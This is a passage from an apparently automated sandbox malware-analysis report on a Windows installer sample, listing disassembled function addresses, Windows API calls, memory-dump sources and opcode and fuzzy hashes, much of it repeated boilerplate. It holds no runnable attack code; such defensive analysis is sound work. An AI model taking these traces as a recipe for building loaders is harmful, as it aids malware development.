                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                            • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                                                            • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                            • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                                                            Function 00403326 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\4NG0guPiKA.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 004061E1
                                                                                                              • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                              • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\4NG0guPiKA.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 004061F5
                                                                                                              • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 00406208
                                                                                                            • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 00403347
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 4115351271-2916873424
                                                                                                            • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                                            • Instruction ID: 15e16a0f1bb74d2da72680a3c6f5190242cf739030cfb371398593c950d8801c
                                                                                                            • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                                            • Instruction Fuzzy Hash: 65D0C92250693171C55236663E06FCF166C8F4A32AF129077F805B90D6DB7C2A8245FE
                                                                                                            Function 00406974 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                            • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                                                            • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                            • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                            Function 00406B75 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                            • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                                            • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                            • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                                            Function 0040688B Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                            • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                                            • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                            • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                                            Function 00406390 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                            • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                                            • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                            • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                                            Function 004067DE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                            • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                                                            • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                            • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                                                            Function 004068FC Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                            • Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
                                                                                                            • Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                            • Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
                                                                                                            Function 00406848 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                            • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
                                                                                                            • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                            • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                                                            Function 00401F98 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                              • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                              • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 334405425-0
                                                                                                            • Opcode ID: ec4ed1b09714f1aa9f835f2dbd5309446028e52bc8e450eb177df983279e41a5
                                                                                                            • Instruction ID: 2e01ab74a4c934f7e6015694823d512690d69bb111ffb1ad89b514660c000c84
                                                                                                            • Opcode Fuzzy Hash: ec4ed1b09714f1aa9f835f2dbd5309446028e52bc8e450eb177df983279e41a5
                                                                                                            • Instruction Fuzzy Hash: 65219871904215F6CF106F95CE48ADEBAB4AB04358F70417BF601B51E0D7B94D41DA6D
                                                                                                            Function 00401B22 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(008F9040), ref: 00401B92
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree
                                                                                                            • String ID: Call
                                                                                                            • API String ID: 3394109436-1824292864
                                                                                                            • Opcode ID: fa756fabfd28fe389d560697bb7080b79a52f5873eaf941668f0573c6073e784
                                                                                                            • Instruction ID: 0d74e211bf3f77f63613a954a16e526c6d046d9130d490d95d437df5f5263094
                                                                                                            • Opcode Fuzzy Hash: fa756fabfd28fe389d560697bb7080b79a52f5873eaf941668f0573c6073e784
                                                                                                            • Instruction Fuzzy Hash: 2F2196B2604501ABCB10EB94DE8599FB3A8EB44318B24053BF541B32D1D778AC019FAD
                                                                                                            Function 10002868 Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnumErrorLastWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 14984897-0
                                                                                                            • Opcode ID: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                            • Instruction ID: 346bc7c3d20138bcfc700b2b1684b28c90b224d1e8b0175626a50a5a3d135241
                                                                                                            • Opcode Fuzzy Hash: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                            • Instruction Fuzzy Hash: 0E51A2BA905215DFFB10DFA4DC8275937A8EB443D4F22C42AEA049721DCF34A991CB55
                                                                                                            Function 004023E0 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001FC,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso68A0.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
